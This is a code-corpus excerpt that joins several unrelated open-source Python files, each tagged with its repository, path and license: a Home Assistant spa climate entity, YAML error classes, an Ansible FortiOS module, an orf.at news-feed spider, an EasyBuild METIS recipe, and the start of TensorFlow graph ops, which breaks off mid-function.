from homeassistant.components.climate.const import (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_OFF,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_WHOLE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from .const import CLIMATE, CLIMATE_SUPPORTED_FANSTATES, CLIMATE_SUPPORTED_MODES, DOMAIN
from .entity import BalboaEntity
SET_TEMPERATURE_WAIT = 1
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the spa climate device."""
async_add_entities(
[
BalboaSpaClimate(
entry,
hass.data[DOMAIN][entry.entry_id],
CLIMATE,
)
],
)
class BalboaSpaClimate(BalboaEntity, ClimateEntity):
"""Representation of a Balboa Spa Climate device."""
_attr_icon = "mdi:hot-tub"
_attr_fan_modes = CLIMATE_SUPPORTED_FANSTATES
_attr_hvac_modes = CLIMATE_SUPPORTED_MODES
def __init__(self, entry, client, devtype, num=None):
"""Initialize the climate entity."""
super().__init__(entry, client, devtype, num)
self._balboa_to_ha_blower_map = {
self._client.BLOWER_OFF: FAN_OFF,
self._client.BLOWER_LOW: FAN_LOW,
self._client.BLOWER_MEDIUM: FAN_MEDIUM,
self._client.BLOWER_HIGH: FAN_HIGH,
}
self._ha_to_balboa_blower_map = {
value: key for key, value in self._balboa_to_ha_blower_map.items()
}
self._balboa_to_ha_heatmode_map = {
self._client.HEATMODE_READY: HVAC_MODE_HEAT,
self._client.HEATMODE_RNR: HVAC_MODE_AUTO,
self._client.HEATMODE_REST: HVAC_MODE_OFF,
}
self._ha_heatmode_to_balboa_map = {
value: key for key, value in self._balboa_to_ha_heatmode_map.items()
}
scale = self._client.get_tempscale()
self._attr_preset_modes = self._client.get_heatmode_stringlist()
self._attr_supported_features = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
if self._client.have_blower():
self._attr_supported_features |= SUPPORT_FAN_MODE
self._attr_min_temp = self._client.tmin[self._client.TEMPRANGE_LOW][scale]
self._attr_max_temp = self._client.tmax[self._client.TEMPRANGE_HIGH][scale]
self._attr_temperature_unit = TEMP_FAHRENHEIT
self._attr_precision = PRECISION_WHOLE
if self._client.get_tempscale() == self._client.TSCALE_C:
self._attr_temperature_unit = TEMP_CELSIUS
self._attr_precision = PRECISION_HALVES
@property
def hvac_mode(self) -> str:
"""Return the current HVAC mode."""
mode = self._client.get_heatmode()
return self._balboa_to_ha_heatmode_map[mode]
@property
def hvac_action(self) -> str:
"""Return the current operation mode."""
state = self._client.get_heatstate()
if state >= self._client.ON:
return CURRENT_HVAC_HEAT
return CURRENT_HVAC_IDLE
@property
def fan_mode(self) -> str:
"""Return the current fan mode."""
fanmode = self._client.get_blower()
return self._balboa_to_ha_blower_map.get(fanmode, FAN_OFF)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._client.get_curtemp()
@property
def target_temperature(self):
"""Return the target temperature we try to reach."""
return self._client.get_settemp()
@property
def preset_mode(self):
"""Return current preset mode."""
return self._client.get_heatmode(True)
async def async_set_temperature(self, **kwargs):
"""Set a new target temperature."""
scale = self._client.get_tempscale()
newtemp = kwargs[ATTR_TEMPERATURE]
if newtemp > self._client.tmax[self._client.TEMPRANGE_LOW][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_HIGH)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
if newtemp < self._client.tmin[self._client.TEMPRANGE_HIGH][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_LOW)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
await self._client.send_temp_change(newtemp)
async def async_set_preset_mode(self, preset_mode) -> None:
"""Set new preset mode."""
modelist = self._client.get_heatmode_stringlist()
self._async_validate_mode_or_raise(preset_mode)
if preset_mode not in modelist:
raise ValueError(f"{preset_mode} is not a valid preset mode")
await self._client.change_heatmode(modelist.index(preset_mode))
async def async_set_fan_mode(self, fan_mode):
"""Set new fan mode."""
await self._client.change_blower(self._ha_to_balboa_blower_map[fan_mode])
def _async_validate_mode_or_raise(self, mode):
"""Check that the mode can be set."""
if mode == self._client.HEATMODE_RNR:
raise ValueError(f"{mode} can only be reported but not set")
async def async_set_hvac_mode(self, hvac_mode):
"""Set new target hvac mode.
OFF = Rest
AUTO = Ready in Rest (can't be set, only reported)
HEAT = Ready
"""
mode = self._ha_heatmode_to_balboa_map[hvac_mode]
self._async_validate_mode_or_raise(mode)
await self._client.change_heatmode(self._ha_heatmode_to_balboa_map[hvac_mode])
|
home-assistant/home-assistant
|
homeassistant/components/balboa/climate.py
|
Python
|
apache-2.0
| 5,803
|
from girder_worker import GirderWorkerPluginABC
class DockerPlugin(GirderWorkerPluginABC):
def __init__(self, app, *args, **kwargs):
self.app = app
def task_imports(self):
return ['girder_worker.docker.tasks']
|
girder/girder_worker
|
girder_worker/docker/__init__.py
|
Python
|
apache-2.0
| 238
|
# coding: utf-8
from __future__ import absolute_import
__all__ = ['Mark', 'YAMLError', 'MarkedYAMLError']
try:
from .compat import utf8
except (ImportError, ValueError): # for Jython
from ruamel.yaml.compat import utf8
class Mark(object):
def __init__(self, name, index, line, column, buffer, pointer):
self.name = name
self.index = index
self.line = line
self.column = column
self.buffer = buffer
self.pointer = pointer
def get_snippet(self, indent=4, max_length=75):
if self.buffer is None:
return None
head = ''
start = self.pointer
while (start > 0 and
self.buffer[start-1] not in u'\0\r\n\x85\u2028\u2029'):
start -= 1
if self.pointer-start > max_length/2-1:
head = ' ... '
start += 5
break
tail = ''
end = self.pointer
while (end < len(self.buffer) and
self.buffer[end] not in u'\0\r\n\x85\u2028\u2029'):
end += 1
if end-self.pointer > max_length/2-1:
tail = ' ... '
end -= 5
break
snippet = utf8(self.buffer[start:end])
return ' '*indent + head + snippet + tail + '\n' \
+ ' '*(indent+self.pointer-start+len(head)) + '^'
def __str__(self):
snippet = self.get_snippet()
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line+1, self.column+1)
if snippet is not None:
where += ":\n"+snippet
return where
class YAMLError(Exception):
pass
class MarkedYAMLError(YAMLError):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None):
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
def __str__(self):
lines = []
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None or
self.context_mark.name != self.problem_mark.name or
self.context_mark.line != self.problem_mark.line or
self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None:
lines.append(self.note)
return '\n'.join(lines)
|
naparuba/opsbro
|
opsbro/misc/internalyaml/ruamel/yaml/error.py
|
Python
|
mit
| 2,752
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_switch_controller_stp_settings
short_description: Configure FortiSwitch spanning tree protocol (STP) in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify switch_controller feature and stp_settings category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
switch_controller_stp_settings:
description:
- Configure FortiSwitch spanning tree protocol (STP).
default: null
type: dict
suboptions:
forward_time:
description:
- Period of time a port is in listening and learning state (4 - 30 sec).
type: int
hello_time:
description:
- Period of time between successive STP frame Bridge Protocol Data Units (BPDUs) sent on a port (1 - 10 sec).
type: int
max_age:
description:
- Maximum time before a bridge port saves its configuration BPDU information (6 - 40 sec).
type: int
max_hops:
description:
- Maximum number of hops between the root bridge and the furthest bridge (1- 40).
type: int
name:
description:
- Name of global STP settings configuration.
type: str
pending_timer:
description:
- Pending time (1 - 15 sec).
type: int
revision:
description:
- STP revision number (0 - 65535).
type: int
status:
description:
- Enable/disable STP.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure FortiSwitch spanning tree protocol (STP).
fortios_switch_controller_stp_settings:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
switch_controller_stp_settings:
forward_time: "3"
hello_time: "4"
max_age: "5"
max_hops: "6"
name: "default_name_7"
pending_timer: "8"
revision: "9"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_switch_controller_stp_settings_data(json):
option_list = ['forward_time', 'hello_time', 'max_age',
'max_hops', 'name', 'pending_timer',
'revision', 'status']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for elem in data:
elem = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def switch_controller_stp_settings(data, fos):
vdom = data['vdom']
switch_controller_stp_settings_data = data['switch_controller_stp_settings']
filtered_data = underscore_to_hyphen(filter_switch_controller_stp_settings_data(switch_controller_stp_settings_data))
return fos.set('switch-controller',
'stp-settings',
data=filtered_data,
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_switch_controller(data, fos):
if data['switch_controller_stp_settings']:
resp = switch_controller_stp_settings(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "default": "", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"switch_controller_stp_settings": {
"required": False, "type": "dict", "default": None,
"options": {
"forward_time": {"required": False, "type": "int"},
"hello_time": {"required": False, "type": "int"},
"max_age": {"required": False, "type": "int"},
"max_hops": {"required": False, "type": "int"},
"name": {"required": False, "type": "str"},
"pending_timer": {"required": False, "type": "int"},
"revision": {"required": False, "type": "int"},
"status": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
# legacy_mode refers to using fortiosapi instead of HTTPAPI
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_switch_controller(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_switch_controller(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
|
thaim/ansible
|
lib/ansible/modules/network/fortios/fortios_switch_controller_stp_settings.py
|
Python
|
mit
| 10,652
|
__all__ = ["read"]
|
khachik/ghugh
|
data/__init__.py
|
Python
|
bsd-2-clause
| 19
|
import json
import re
from urllib.parse import urlparse
import lxml
import scrapy
from inline_requests import inline_requests
from scrapy.selector import Selector
from feeds.loaders import FeedEntryItemLoader
from feeds.spiders import FeedsXMLFeedSpider
from feeds.utils import generate_feed_header
class OrfAtSpider(FeedsXMLFeedSpider):
name = "orf.at"
namespaces = [
("dc", "http://purl.org/dc/elements/1.1/"),
("orfon", "http://rss.orf.at/1.0/"),
("rdf", "http://www.w3.org/1999/02/22-rdf-syntax-ns#"),
# Default (empty) namespaces are not supported so we just come up with one.
("rss", "http://purl.org/rss/1.0/"),
]
itertag = "rss:item"
# Use XML iterator instead of regex magic which would fail due to the
# introduced rss namespace prefix.
iterator = "xml"
def start_requests(self):
channels = self.settings.get("FEEDS_SPIDER_ORF_AT_CHANNELS")
if channels:
channels = set(channels.split())
else:
channels = {"news"}
available_channels = {
"burgenland",
"fm4",
"help",
"kaernten",
"news",
"noe",
"oe3",
"oesterreich",
"ooe",
"religion",
"salzburg",
"science",
"sport",
"steiermark",
"tirol",
"vorarlberg",
"wien",
}
unknown_channels = channels - available_channels
if unknown_channels:
self.logger.warning(
"Unknown channel(s) in config file: {}".format(
", ".join(unknown_channels)
)
)
for channel in channels:
yield scrapy.Request(
"https://rss.orf.at/{}.xml".format(channel),
meta={"path": channel, "dont_cache": True},
)
self._channels = channels
self._authors = [
author
for author in (
self.settings.get("FEEDS_SPIDER_ORF_AT_AUTHORS", "").split("\n")
)
if author
]
def feed_headers(self):
for channel in self._channels:
channel_url = "{}.ORF.at".format(channel)
yield generate_feed_header(
title=channel_url,
link="https://{}".format(channel_url.lower()),
path=channel,
logo=self._get_logo(channel),
)
for author in self._authors:
yield generate_feed_header(title="ORF.at: {}".format(author), path=author)
def parse(self, response):
selector = Selector(response, type="xml")
doc = lxml.etree.ElementTree(lxml.etree.fromstring(response.body))
if doc.getroot().nsmap:
self._register_namespaces(selector)
nodes = selector.xpath("//%s" % self.itertag)
else:
nodes = selector.xpath("//item")
return self.parse_nodes(response, nodes)
def parse_node(self, response, node):
if "orfon" in node.namespaces:
return self._parse_extended_node(response, node)
else:
return self._parse_simple_node(response, node)
def _parse_extended_node(self, response, node):
categories = [
node.xpath("orfon:storyType/@rdf:resource").re_first("urn:orfon:type:(.*)"),
node.xpath("dc:subject/text()").extract_first(),
]
substories = node.xpath(
"orfon:substories/rdf:Bag/rdf:li/@rdf:resource"
).extract()
updated = node.xpath("dc:date/text()").extract_first()
meta = {
"path": response.meta["path"],
"categories": categories,
"updated": updated,
}
if substories:
links = substories
else:
links = [node.xpath("rss:link/text()").extract_first()]
for link in links:
fixed_link = self._extract_link(link)
if fixed_link is None or any(
fixed_link.startswith(url)
for url in ["https://debatte.orf.at", "https://iptv.orf.at"]
):
self.logger.debug(
"Ignoring link to '{}' ('{}')".format(link, fixed_link)
)
else:
yield scrapy.Request(fixed_link, self._parse_article, meta=meta)
def _parse_simple_node(self, response, node):
meta = {
"path": response.meta["path"],
"categories": node.xpath("category/text()").extract(),
"updated": node.xpath("pubDate/text()").extract_first(),
}
link = node.xpath("link/text()").extract_first()
return scrapy.Request(link, self._parse_article, meta=meta)
@staticmethod
def _extract_link(link):
"""Extract a working link from a possibly broken link."""
if link is None:
return None
match = re.search(r"https?://(?:[^\.]+\.)?orf\.at/(?:news/)?stories/\d*", link)
return match.group(0) + "/" if match else None
@inline_requests
def _parse_article(self, response):
# Heuristic for news.ORF.at to to detect teaser articles.
more = self._extract_link(
response.css(
".story-story p > strong:contains('Mehr') + a::attr(href), "
+ ".story-story p > a:contains('Lesen Sie mehr')::attr(href)"
).extract_first()
)
if more and more != response.url:
self.logger.debug("Detected teaser article, redirecting to {}".format(more))
response = yield scrapy.Request(more, meta=response.meta)
remove_elems = [
".byline",
"h1",
".socialshare",
".socialShareWrapper",
".socialButtons",
".credit",
".toplink",
".offscreen",
".storyMeta",
"script",
".oon-youtube-logo",
".vote",
# redesign
"#more-to-read-anchor",
".social-buttons",
".story-horizontal-ad",
".linkcard",
".geolocation", # Bundesländer
]
pullup_elems = {
".remote .slideshow": 1,
".remote .instagram": 1,
".remote .facebook": 1,
".remote .twitter": 1,
".remote .youtube": 1,
".remote table": 1,
}
replace_elems = {
".video": "<p><em>Hinweis: Das eingebettete Video ist nur im Artikel "
+ "verfügbar.</em></p>",
".slideshow": (
"<p><em>Alte Slideshows werden nicht mehr unterstützt.</em></p>"
),
}
change_attribs = {"img": {"data-src": "src", "srcset": "src"}}
change_tags = {
".image": "figure",
".caption": "figcaption",
".fact": "blockquote", # FM4
}
author, author_selector = self._extract_author(response)
if author:
self.logger.debug("Extracted possible author '{}'".format(author))
# Remove the paragraph that contains the author.
remove_elems.insert(0, author_selector)
else:
self.logger.debug("Could not extract author name")
author = "{}.ORF.at".format(response.meta["path"])
for slideshow in response.css(".slideshow"):
link = response.urljoin(
slideshow.css('::attr("data-slideshow-json-href")').extract_first()
).replace("jsonp", "json")
slideshow_id = slideshow.css('::attr("id")').extract_first()
slideshow_response = yield scrapy.Request(link)
replace_elems["#{}".format(slideshow_id)] = self._create_slideshow_html(
slideshow_response
)
il = FeedEntryItemLoader(
response=response,
remove_elems=remove_elems,
pullup_elems=pullup_elems,
replace_elems=replace_elems,
change_attribs=change_attribs,
change_tags=change_tags,
)
# The field is part of a JSON that is sometimes not valid, so don't bother with
# parsing it properly.
match = re.search(r'"datePublished": "([^"]+)"', response.text)
if match:
# news.ORF.at
updated = match.group(1)
else:
# other
updated = response.meta["updated"]
il.add_value("updated", updated)
il.add_css("title", ".story-lead-headline ::text") # news
il.add_css("title", "#ss-storyText > h1 ::text") # FM4, science
il.add_value("link", response.url)
il.add_css("content_html", ".opener img") # FM4, news
il.add_css("content_html", ".story-lead-text") # news
il.add_css("content_html", "#ss-storyText")
il.add_css("content_html", "#ss-storyContent") # news
il.add_value("author_name", author)
if author in self._authors:
il.add_value("path", author)
il.add_value("path", response.meta["path"])
il.add_value("category", response.meta["categories"])
yield il.load_item()
@staticmethod
def _create_slideshow_html(response):
slideshow = json.loads(response.text)
figures = []
for photo in slideshow["photos"]:
url = photo["url"]
caption = photo.get("description") or ""
figures.append(
(
'<figure><div><img src="{url}"></div>'
+ "<figcaption>{caption}</figcaption></figure>"
).format(url=url, caption=caption)
)
return "<div>" + "".join(figures) + "</div>"
@staticmethod
def _extract_author(response):
domain = urlparse(response.url).netloc
if domain == "fm4.orf.at":
author = (
response.css("#ss-storyText > .socialButtons")
.xpath(
"following-sibling::p[("
+ "starts-with(., 'Von') or starts-with(., 'von') "
+ "or starts-with(., 'By') or starts-with(., 'by')"
+ ") and position() = 1]/a/text()"
)
.extract_first()
)
author_selector = "#ss-storyText > .socialButtons + p"
if author:
return (author.strip(), author_selector)
elif domain in ["science.orf.at", "help.orf.at", "religion.orf.at"]:
try:
author = (
response.css("#ss-storyText > p:not(.date):not(.toplink)::text")
.extract()[-1]
.strip()
)
# Possible author string must be in [2, 50].
if 2 <= len(author) <= 50:
# Only take the author name before ",".
author = re.split(r"[/,]", author)[0]
return (
author.strip(),
(
"#ss-storyText > p:not(.date):not(.toplink):"
+ "contains('{}')"
).format(author),
)
except IndexError:
pass
else:
author = response.css(".byline ::text").extract_first()
if author:
return (re.split(r"[/,]", author)[0].strip(), ".byline")
return (None, None)
@staticmethod
def _get_logo(channel):
images = {
"fm4": ("tube", "fm4"),
"help": ("tube", "help"),
"science": ("tube", "science"),
"news": ("news", "news"),
}
return (
"https://tubestatic.orf.at/mojo/1_3/storyserver/{}/{}/images/"
+ "touch-icon-ipad-retina.png"
).format(*images.get(channel, images.get("news")))
|
nblock/feeds
|
feeds/spiders/orf_at.py
|
Python
|
agpl-3.0
| 11,972
|
##
# Copyright 2009-2015 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for METIS, implemented as an easyblock
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
import shutil
from distutils.version import LooseVersion
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import mkdir
from easybuild.tools.run import run_cmd
class EB_METIS(ConfigureMake):
"""Support for building and installing METIS."""
def __init__(self, *args, **kwargs):
"""Define custom class variables for METIS."""
super(EB_METIS, self).__init__(*args, **kwargs)
self.lib_exts = []
def configure_step(self, *args, **kwargs):
"""Configure build using 'make config' (only for recent versions (>= v5))."""
if LooseVersion(self.version) >= LooseVersion("5"):
cmd = "make %s config prefix=%s" % (self.cfg['configopts'], self.installdir)
run_cmd(cmd, log_all=True, simple=True)
if 'shared=1' in self.cfg['configopts']:
self.lib_exts.append('so')
else:
self.lib_exts.append('a')
def build_step(self):
"""Add make options before building."""
self.cfg.update('buildopts', 'LIBDIR=""')
if self.toolchain.options['pic']:
self.cfg.update('buildopts', 'CC="$CC -fPIC"')
super(EB_METIS, self).build_step()
def install_step(self):
"""
Install by manually copying files to install dir, for old versions,
or by running 'make install' for new versions.
Create symlinks where expected by other applications
(in Lib instead of lib)
"""
if LooseVersion(self.version) < LooseVersion("5"):
libdir = os.path.join(self.installdir, 'lib')
mkdir(libdir)
includedir = os.path.join(self.installdir, 'include')
mkdir(includedir)
# copy libraries
try:
src = os.path.join(self.cfg['start_dir'], 'libmetis.a')
dst = os.path.join(libdir, 'libmetis.a')
shutil.copy2(src, dst)
except OSError, err:
raise EasyBuildError("Copying file libmetis.a to lib dir failed: %s", err)
# copy include files
try:
for f in ['defs.h', 'macros.h', 'metis.h', 'proto.h', 'rename.h', 'struct.h']:
src = os.path.join(self.cfg['start_dir'], 'Lib', f)
dst = os.path.join(includedir, f)
shutil.copy2(src, dst)
os.chmod(dst, 0755)
except OSError, err:
raise EasyBuildError("Copying file metis.h to include dir failed: %s", err)
# other applications depending on ParMETIS (SuiteSparse for one) look for both ParMETIS libraries
# and header files in the Lib directory (capital L). The following symlinks are hence created.
try:
Libdir = os.path.join(self.installdir, 'Lib')
os.symlink(libdir, Libdir)
for f in ['defs.h', 'macros.h', 'metis.h', 'proto.h', 'rename.h', 'struct.h']:
os.symlink(os.path.join(includedir, f), os.path.join(libdir, f))
except OSError, err:
raise EasyBuildError("Something went wrong during symlink creation: %s", err)
else:
super(EB_METIS, self).install_step()
def sanity_check_step(self):
"""Custom sanity check for METIS (more extensive for recent version (>= v5))"""
binfiles = []
if LooseVersion(self.version) > LooseVersion("5"):
binfiles += ["cmpfillin", "gpmetis", "graphchk", "m2gmetis", "mpmetis", "ndmetis"]
incfiles = ["metis.h"]
if LooseVersion(self.version) < LooseVersion("5"):
incfiles += ["defs.h", "macros.h", "proto.h", "rename.h", "struct.h"]
dirs = []
if LooseVersion(self.version) < LooseVersion("5"):
dirs += ["Lib"]
custom_paths = {
'files': ['bin/%s' % x for x in binfiles] + ['include/%s' % x for x in incfiles] +
['lib/libmetis.%s' % x for x in self.lib_exts],
'dirs' : dirs,
}
super(EB_METIS, self).sanity_check_step(custom_paths=custom_paths)
|
ULHPC/modules
|
easybuild/easybuild-easyblocks/easybuild/easyblocks/m/metis.py
|
Python
|
mit
| 5,585
|
"""Ops for graph construction.
Large amounts of code borrowed from Keras. Will try to incorporate into
DeepChem properly.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
import sys
import traceback
import numpy as np
import tensorflow as tf
from tensorflow.python.training import moving_averages
from collections import defaultdict
# TODO(rbharath): What does this line do?
py_all = all
# TODO(rbharath): REMOVE GLOBAL VARS! BREAKS DEEPCHEM STYLE!
_UID_PREFIXES = defaultdict(int)
# This dictionary holds a mapping {graph: learning_phase}.
# A learning phase is a bool tensor used to run Keras models in
# either train mode (learning_phase == 1) or test mode (learning_phase == 0).
_GRAPH_LEARNING_PHASES = {}
def _to_tensor(x, dtype):
x = tf.convert_to_tensor(x)
if x.dtype != dtype:
x = tf.cast(x, dtype)
return x
def learning_phase():
"""Returns the learning phase flag.
The learning phase flag is a bool tensor (0 = test, 1 = train)
to be passed as input to any Keras function
that uses a different behavior at train time and test time.
"""
graph = tf.get_default_graph()
if graph not in _GRAPH_LEARNING_PHASES:
phase = tf.placeholder(dtype='bool', name='keras_learning_phase')
_GRAPH_LEARNING_PHASES[graph] = phase
return _GRAPH_LEARNING_PHASES[graph]
def in_train_phase(x, alt):
"""Selects `x` in train phase, and `alt` otherwise.
Note that `alt` should have the *same shape* as `x`.
Returns
-------
Either `x` or `alt` based on `K.learning_phase`.
"""
if learning_phase() is 1:
return x
elif learning_phase() is 0:
return alt
# else: assume learning phase is a placeholder tensor.
x = switch(learning_phase(), x, alt)
x._uses_learning_phase = True
return x
def switch(condition, then_expression, else_expression):
"""Switches between two operations
depending on a scalar value (`int` or `bool`).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
Parameters
----------
condition: scalar tensor.
then_expression: either a tensor, or a callable that returns a tensor.
else_expression: either a tensor, or a callable that returns a tensor.
Returns
-------
The selected tensor.
"""
if condition.dtype != tf.bool:
condition = tf.cast(condition, 'bool')
if not callable(then_expression):
def then_expression_fn():
return then_expression
else:
then_expression_fn = then_expression
if not callable(else_expression):
def else_expression_fn():
return else_expression
else:
else_expression_fn = else_expression
x = tf.cond(condition, then_expression_fn, else_expression_fn)
return x
def normalize_batch_in_training(x, gamma, beta, reduction_axes, epsilon=1e-3):
"""Computes mean and std for batch then apply batch_normalization on batch.
Returns
-------
A tuple length of 3, (normalized_tensor, mean, variance).
"""
mean, var = tf.nn.moments(
x, reduction_axes, shift=None, name=None, keep_dims=False)
if sorted(reduction_axes) == range(ndim(x))[:-1]:
normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon)
else:
# need broadcasting
target_shape = []
for axis in range(get_ndim(x)):
if axis in reduction_axes:
target_shape.append(1)
else:
target_shape.append(tf.shape(x)[axis])
target_shape = stack(target_shape)
broadcast_mean = tf.reshape(mean, target_shape)
broadcast_var = tf.reshape(var, target_shape)
broadcast_gamma = tf.reshape(gamma, target_shape)
broadcast_beta = tf.reshape(beta, target_shape)
normed = tf.nn.batch_normalization(x, broadcast_mean, broadcast_var,
broadcast_beta, broadcast_gamma, epsilon)
return normed, mean, var
def ones(shape, dtype=None, name=None):
"""Instantiates an all-ones tensor variable and returns it.
Parameters
----------
shape: Tuple of integers, shape of returned Keras variable.
dtype: Tensorflow dtype
name: String, name of returned Keras variable.
Returns
-------
A Keras variable, filled with `1.0`.
"""
if dtype is None:
dtype = tf.float32
shape = tuple(map(int, shape))
return tf.Variable(
tf.constant_initializer(1., dtype=dtype)(shape), dtype, name)
def cast_to_floatx(x):
"""Cast a Numpy array to the default Keras float type.
Parameters
----------
x: Numpy array.
Returns
-------
The same Numpy array, cast to its new type.
"""
return np.asarray(x, dtype=tf.float32)
def moving_average_update(variable, value, momentum):
try:
return moving_averages.assign_moving_average(
